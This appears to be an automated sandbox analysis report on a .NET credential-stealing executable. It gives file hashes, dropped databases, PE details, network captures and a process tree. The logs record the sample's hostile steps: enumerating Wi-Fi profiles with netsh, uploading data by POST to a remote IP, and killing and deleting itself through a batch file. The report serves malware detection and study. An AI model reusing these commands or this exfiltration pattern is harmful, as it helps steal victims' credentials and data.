                                      File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 4, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 4
                                      Category:dropped
                                      Size (bytes):49152
                                      Entropy (8bit):0.86528072116055
                                      Encrypted:false
                                      SSDEEP:96:kTN7KLWlGxdKmtZeympbn8MouB6w9f/rrGMa:qVlGxdKN7Iw9fj
                                      MD5:8CC409C8658C3F05143C1484A1719879
                                      SHA1:909CDE14664C0E5F943764895E0A9DFEC7831FF5
                                      SHA-256:BC69C3518DA2ABC8904F314F078D9672BAF3B840E09FD2B2E95D4B07A03A85A4
                                      SHA-512:55D8923B6481ADF442817B7BAA50C36CBAD8DAC0EC600451813D29F4775DE519A06158A6233E61635CD0ED862E60AC7F50C75556C4E89D583D8A8A4299F1808F
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                      Category:dropped
                                      Size (bytes):135168
                                      Entropy (8bit):1.0873605234887023
                                      Encrypted:false
                                      SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                      MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                      SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                      SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                      SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                      Malicious:false
                                      Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                      Category:dropped
                                      Size (bytes):135168
                                      Entropy (8bit):1.0873605234887023
                                      Encrypted:false
                                      SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                      MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                      SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                      SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                      SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                      Malicious:false
                                      Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3045002, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                      Category:dropped
                                      Size (bytes):20480
                                      Entropy (8bit):1.4026573159402624
                                      Encrypted:false
                                      SSDEEP:48:TB9aw/aHLopFMavU1/iB8eVC+rQ88TkQqp8JHyDlEKw0esEieNp:1PareMa8K8eVC+rZ8TkQqpWSDlNufp
                                      MD5:F49DFF163167A43F4940B7337A092C07
                                      SHA1:1A8BAAC92537FA0BD39063D17C3072AD86190CC4
                                      SHA-256:B3D38278030DBEA9D1CDDC177F9B6CB590CE1D383A88211B231402B7CA208CF3
                                      SHA-512:BC7685763D70300FE2AE28803D9F886D91004F6045A995065FAAEB6A9DFCAB77E80B475516E9B4C1F8969E112E2B48C7E68FC2AB15F61BB69443A8C54E24066F
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................v.......@..g.....@....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:MS Windows registry file, NT/2000 or above
                                      Category:dropped
                                      Size (bytes):2359296
                                      Entropy (8bit):4.3613348279476725
                                      Encrypted:false
                                      SSDEEP:49152:RZAhNXBlw3Ak2BGUS5Dc0Uag6nSz8a8aO:G
                                      MD5:BA1CF1165833E8BBA124C298C1874F77
                                      SHA1:70F67ADDB69299C6090BD30FF4720666D63EEDFD
                                      SHA-256:27F3B449F577C6C99A040FCDD4E4E385482BA713A54C87B6D490FA4FA749BD85
                                      SHA-512:2741449AF7FF496A9274E50A07F5277A8AE0D153DC001120F25EB362AD01C34A91274FB2D9B8060D74F65CBE7376396D3342626709C6788F64FC6A54B1E36A47
                                      Malicious:false
                                      Preview:regf........5.#.^................... .....!.....\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtmN.X.!F..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:MS Windows registry file, NT/2000 or above
                                      Category:dropped
                                      Size (bytes):73728
                                      Entropy (8bit):4.640025520894351
                                      Encrypted:false
                                      SSDEEP:768:bqQyP8n92v+FSLAbURlLlP9RyOuiruMsMd8dMwDGY0i5fRFrsJpyG2gKOrndx7sK:2dee9ruiruoSRFrsJdNYP0Ggyf
                                      MD5:DEBAC5066CF670E440AED127A70DFD45
                                      SHA1:08240A1E60D12BA90B8379A3DF3A64218C1DC4D5
                                      SHA-256:9872C3380BF70659DCEAFF093466AA13B70D8E0FDC60A9D3427B6B2D00E5A019
                                      SHA-512:E8963F69C840271F3E4286EA86409437833562DB71C06737244F2C0772364522DA603907245967A496D618CA0C2EAD41D4BC6F1E54F2A392CD8D99B4BCAD598D
                                      Malicious:false
                                      Preview:regf........5.#.^................... .....!.....\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtmN.X.!F..................................................................................................................................................................................................................................................................................................................................................HvLE..............!......fd..!... .-.h.......................... .......p...............................P...............................`... ..........................hbin................5.#.^...........nk,....S....... .......................................................&...{11517B7C-E79D-4e20-961B-75A811715ADD}......nk .....9......(...........@...............................*...N.......)...InventoryMiscellaneousMemorySlotArrayInfo....................mG.....nk .$4./T....... ...
                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.27057880752327
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                      • Win32 Executable (generic) a (10002005/4) 49.96%
                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:3K5MXGVOJE.exe
                                      File size:1'005'056 bytes
                                      MD5:532e953689741622b91a29f7db4bcce0
                                      SHA1:fbeb0bc18838b33caecfa429fec80431fc69c469
                                      SHA256:dd503955140cfd86c1189e79bfd7b0c7b5ebc7ff7348fd9180486362614a880d
                                      SHA512:03b3999bcb1bf1a206ea506f809992042d406d5561b9b0e379a36f868e0ee5c71117449072072fa5b63fe86458607d130cf6940da7c9eba964280d7d87b9f628
                                      SSDEEP:24576:B679r/wgkC9X7JqkbM1SVoFoxvUAZOpucAClz:GS8XAkoIVoFMvJO0O
                                      TLSH:4525BF182ACCCD86C6890333E46240F5D5F0BA55F6CBD3A6B5497AE93FAD3B4E4050A7
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ........@.. ....................................`................................
                                      Icon Hash:90cececece8e8eb0
                                      Entrypoint:0x42abea
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x95B6C1D8 [Thu Aug 5 13:19:20 2049 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                      Name | Virtual Address | Virtual Size | Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2ab98 | 0x4f | .text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf8000 | 0x150c | .rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xfa000 | 0xc | .reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x2aaf8 | 0x38 | .text
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0xd1e10 | 0x48 | .T]1
                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                      .text | 0x2000 | 0x29650 | 0x29800 | 45818c67f56ddb02ae660ca1531655e1 | False | 0.8692465173192772 | data | 7.867046875219915 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .Nw | 0x2c000 | 0x7e3a3 | 0x7e400 | 9f2b273f4e701b8e812b9119c207d826 | False | 0.7242206837871287 | COM executable for DOS | 7.056379099711291 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .T]1 | 0xac000 | 0x4bc60 | 0x4be00 | 329cdf805bc6350fb921e8b6b1420765 | False | 0.5974567545304778 | data | 6.844845731566418 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc | 0xf8000 | 0x150c | 0x1600 | a24c95a0275f3452dc966cdb7b2f254d | False | 0.3913352272727273 | data | 5.414192396678741 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc | 0xfa000 | 0xc | 0x200 | d8943c7532d69bb209b7dec76f20f919 | False | 0.048828125 | data | 0.12227588125913882 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                      RT_VERSION | 0xf8090 | 0x340 | data | | | 0.45072115384615385
                                      RT_MANIFEST | 0xf83e0 | 0x1126 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.40387243735763095
                                      DLL | Import
                                      mscoree.dll | _CorExeMain
                                      Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                      2024-12-04T14:54:04.616127+0100 | 2843856 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 | 1 | 192.168.11.20 | 49712 | 89.23.100.233 | 1489 | TCP
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Dec 4, 2024 14:53:57.177542925 CET | 63664 | 53 | 192.168.11.20 | 1.1.1.1
                                      Dec 4, 2024 14:53:57.305327892 CET | 53 | 63664 | 1.1.1.1 | 192.168.11.20
                                      Dec 4, 2024 14:53:57.617691040 CET | 57073 | 53 | 192.168.11.20 | 1.1.1.1
                                      Dec 4, 2024 14:53:57.745100021 CET | 53 | 57073 | 1.1.1.1 | 192.168.11.20
                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                      Dec 4, 2024 14:53:57.177542925 CET | 192.168.11.20 | 1.1.1.1 | 0x7824 | Standard query (0) | icanhazip.com | A (IP address) | IN (0x0001) | false
                                      Dec 4, 2024 14:53:57.617691040 CET | 192.168.11.20 | 1.1.1.1 | 0x6a04 | Standard query (0) | 90.168.9.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                      Dec 4, 2024 14:53:57.305327892 CET | 1.1.1.1 | 192.168.11.20 | 0x7824 | No error (0) | icanhazip.com | | 104.16.185.241 | A (IP address) | IN (0x0001) | false
                                      Dec 4, 2024 14:53:57.305327892 CET | 1.1.1.1 | 192.168.11.20 | 0x7824 | No error (0) | icanhazip.com | | 104.16.184.241 | A (IP address) | IN (0x0001) | false
                                      Dec 4, 2024 14:53:57.745100021 CET | 1.1.1.1 | 192.168.11.20 | 0x6a04 | Name error (3) | 90.168.9.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                                      • icanhazip.com
                                      • 89.23.100.233:1489
                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      0 | 192.168.11.20 | 49711 | 104.16.185.241 | 80 | 4236 | C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Dec 4, 2024 14:53:57.458498955 CET | 63 | OUT | GET / HTTP/1.1
                                      Host: icanhazip.com
                                      Connection: Keep-Alive
                                      Dec 4, 2024 14:53:57.594958067 CET | 535 | IN | HTTP/1.1 200 OK
                                      Date: Wed, 04 Dec 2024 13:53:57 GMT
                                      Content-Type: text/plain
                                      Content-Length: 13
                                      Connection: keep-alive
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET
                                      Set-Cookie: __cf_bm=kIZcPiyx7c2zMMO396_gYRhaoLoX8N1Te8vuUbRUusk-1733320437-1.0.1.1-B2mqRYfL3.uZ8Npf8AEqFVpQNYujJujN1shS1zQgbXhjpyLK3Y2idvoDNe8UxLKwj2MXZLBMlgifzs8VrsayGg; path=/; expires=Wed, 04-Dec-24 14:23:57 GMT; domain=.icanhazip.com; HttpOnly
                                      Server: cloudflare
                                      CF-RAY: 8ecc491e889e3353-MIA
                                      alt-svc: h3=":443"; ma=86400
                                      Data Raw: 38 34 2e 31 37 2e 34 30 2e 31 31 30 0a
                                      Data Ascii: 84.17.40.110


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      1 | 192.168.11.20 | 49712 | 89.23.100.233 | 1489 | 4236 | C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Dec 4, 2024 14:54:03.820700884 CET | 205 | OUT | POST /upload HTTP/1.1
                                      Content-Type: multipart/form-data; boundary="84b32282-3d72-4c2c-a4cc-4a340d632b96"
                                      Host: 89.23.100.233:1489
                                      Content-Length: 132449
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Dec 4, 2024 14:54:04.088846922 CET | 25 | IN | HTTP/1.1 100 Continue
                                      Dec 4, 2024 14:54:04.352282047 CET | 25 | IN | HTTP/1.1 100 Continue
                                      Dec 4, 2024 14:54:06.767086983 CET | 165 | IN | HTTP/1.1 200 OK
                                      Server: Werkzeug/3.1.3 Python/3.13.0
                                      Date: Wed, 04 Dec 2024 13:54:06 GMT
                                      Content-Type: application/json
                                      Content-Length: 61
                                      Connection: close



                                      Target ID:0
                                      Start time:08:53:54
                                      Start date:04/12/2024
                                      Path:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\3K5MXGVOJE.exe"
                                      Imagebase:0x770000
                                      File size:1'005'056 bytes
                                      MD5 hash:532E953689741622B91A29F7DB4BCCE0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:08:53:55
                                      Start date:04/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"cmd.exe" /c tasklist
                                      Imagebase:0x590000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:08:53:55
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff78dff0000
                                      File size:875'008 bytes
                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:08:53:56
                                      Start date:04/12/2024
                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                      Wow64 process (32bit):true
                                      Commandline:tasklist
                                      Imagebase:0x4a0000
                                      File size:79'360 bytes
                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:08:53:56
                                      Start date:04/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
                                      Imagebase:0x590000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:08:53:56
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff78dff0000
                                      File size:875'008 bytes
                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:7
                                      Start time:08:53:56
                                      Start date:04/12/2024
                                      Path:C:\Windows\SysWOW64\chcp.com
                                      Wow64 process (32bit):true
                                      Commandline:chcp 65001
                                      Imagebase:0x1000000
                                      File size:12'800 bytes
                                      MD5 hash:41146159AA3D41A92B53ED311EE15693
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:8
                                      Start time:08:53:56
                                      Start date:04/12/2024
                                      Path:C:\Windows\SysWOW64\netsh.exe
                                      Wow64 process (32bit):true
                                      Commandline:netsh wlan show profiles
                                      Imagebase:0x1790000
                                      File size:82'432 bytes
                                      MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:9
                                      Start time:08:53:56
                                      Start date:04/12/2024
                                      Path:C:\Windows\SysWOW64\findstr.exe
                                      Wow64 process (32bit):true
                                      Commandline:findstr All
                                      Imagebase:0x9c0000
                                      File size:29'696 bytes
                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:11
                                      Start time:08:54:11
                                      Start date:04/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat
                                      Imagebase:0x590000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:12
                                      Start time:08:54:11
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff78dff0000
                                      File size:875'008 bytes
                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:13
                                      Start time:08:54:11
                                      Start date:04/12/2024
                                      Path:C:\Windows\SysWOW64\chcp.com
                                      Wow64 process (32bit):true
                                      Commandline:chcp 65001
                                      Imagebase:0x1000000
                                      File size:12'800 bytes
                                      MD5 hash:41146159AA3D41A92B53ED311EE15693
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:15
                                      Start time:08:54:11
                                      Start date:04/12/2024
                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                      Wow64 process (32bit):true
                                      Commandline:TaskKill /F /IM 4236
                                      Imagebase:0x2b0000
                                      File size:74'240 bytes
                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:17
                                      Start time:08:54:11
                                      Start date:04/12/2024
                                      Path:C:\Windows\SysWOW64\timeout.exe
                                      Wow64 process (32bit):true
                                      Commandline:Timeout /T 2 /Nobreak
                                      Imagebase:0xb40000
                                      File size:25'088 bytes
                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:18
                                      Start time:08:54:11
                                      Start date:04/12/2024
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 3212
                                      Imagebase:0xd50000
                                      File size:482'640 bytes
                                      MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true


                                        Execution Graph

                                        Execution Coverage:30.5%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:100%
                                        Total number of Nodes:24
                                        Total number of Limit Nodes:0
                                        execution_graph 46759 5184d18 46760 5184d63 NtMapViewOfSection 46759->46760 46762 5184dc5 46760->46762 46763 5184a98 46764 5184ae6 NtOpenFile 46763->46764 46766 5184b30 46764->46766 46767 5184e08 46768 5184e50 NtQueryVolumeInformationFile 46767->46768 46770 5184e8e 46768->46770 46783 5184678 46784 51846c6 NtProtectVirtualMemory 46783->46784 46786 5184710 46784->46786 46771 5184750 46772 518479b NtAllocateVirtualMemory 46771->46772 46774 51847e2 46772->46774 46775 5184ed0 46776 5184f18 NtDeviceIoControlFile 46775->46776 46778 5184f65 46776->46778 46779 51841c0 46780 5184200 NtClose 46779->46780 46782 5184231 46780->46782 46787 5184b70 46788 5184bbe NtCreateSection 46787->46788 46790 5184c0b 46788->46790

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3)4$(:'U$1-8$4d*$8y,y$e}~s$jNP$m~w1$qB
                                        • API String ID: 0-946364564
                                        • Opcode ID: 2cfe3a2e8bf0cbd6987d9e757b1d96553558d2626472828c875454c2de09abce
                                        • Instruction ID: 62b32a342a4d8c871cd536731fef7eb73a5230edb13fd95772ed686b64765bf5
                                        • Opcode Fuzzy Hash: 2cfe3a2e8bf0cbd6987d9e757b1d96553558d2626472828c875454c2de09abce
                                        • Instruction Fuzzy Hash: 81B3DB74E006189FDB94DFA8D891A9EBBB2EF88314F2081E9D449E7354DB349E81CF54

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3)4$(:'U$1-8$4d*$8y,y$e}~s$jNP$m~w1$qB
                                        • API String ID: 0-946364564
                                        • Opcode ID: 922673624e45bf078ecc461370476a4453edf108ed0ee1d60e45881f184202a5
                                        • Instruction ID: 11de1279474a07d15d1991286b73946a68ef9b8d884b394c8e5dc1d7c6a13075
                                        • Opcode Fuzzy Hash: 922673624e45bf078ecc461370476a4453edf108ed0ee1d60e45881f184202a5
                                        • Instruction Fuzzy Hash: F4B3DB74E006189FDB94DFA8D891A9EBBB2EF88314F2081E9D449E7354DB349E81CF54
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b40000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 6'$$$3^$*s2Y$-R9\$6.|$=T,<
                                        • API String ID: 0-145396161
                                        • Opcode ID: ccc3f10d2872f5c640d50f6e8ce27ff2f093b79785d96bab7661244035469224
                                        • Instruction ID: 71b1fffcc3891307a28856b35fd284ef575220af4e4541d8bea0fdb9e3de6a79
                                        • Opcode Fuzzy Hash: ccc3f10d2872f5c640d50f6e8ce27ff2f093b79785d96bab7661244035469224
                                        • Instruction Fuzzy Hash: ABE30075F102289FCB64DF68C840A99B7F6EF89300F5585EAD809F7351DA35AE819F80

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $!$"$#$$$%$&$.$C
                                        • API String ID: 0-3201246462
                                        • Opcode ID: 08ec64e965493c56f887ddc00f8d82509ef0409f34d751947c00cf2c78bef83f
                                        • Instruction ID: 290f5c4a7427905c686a7d973dfa575fdac3bf81d48a3fedee3844302b58a828
                                        • Opcode Fuzzy Hash: 08ec64e965493c56f887ddc00f8d82509ef0409f34d751947c00cf2c78bef83f
                                        • Instruction Fuzzy Hash: 7A82B471B002244BEB94EBF8E8547AFA2A7EBC8314F54412AD48ADB381DF785D054FE5

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $!$"$#$*w/8
                                        • API String ID: 0-3151260935
                                        • Opcode ID: d45d3d5b656971c03f6ee6d3109a2a742ec9f908f1713b2ee75d785b836239e4
                                        • Instruction ID: e9592866f8702d9e4fd9ae598daab74caf5df6c4c8bb2c417407263351fda567
                                        • Opcode Fuzzy Hash: d45d3d5b656971c03f6ee6d3109a2a742ec9f908f1713b2ee75d785b836239e4
                                        • Instruction Fuzzy Hash: 83328170B002245BEB94FBF8E85476E76ABEBC8314F51412AD585EB391CF789C018BE5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0l8J$7Q#P$9l#$<71^$N'#r
                                        • API String ID: 0-301275794
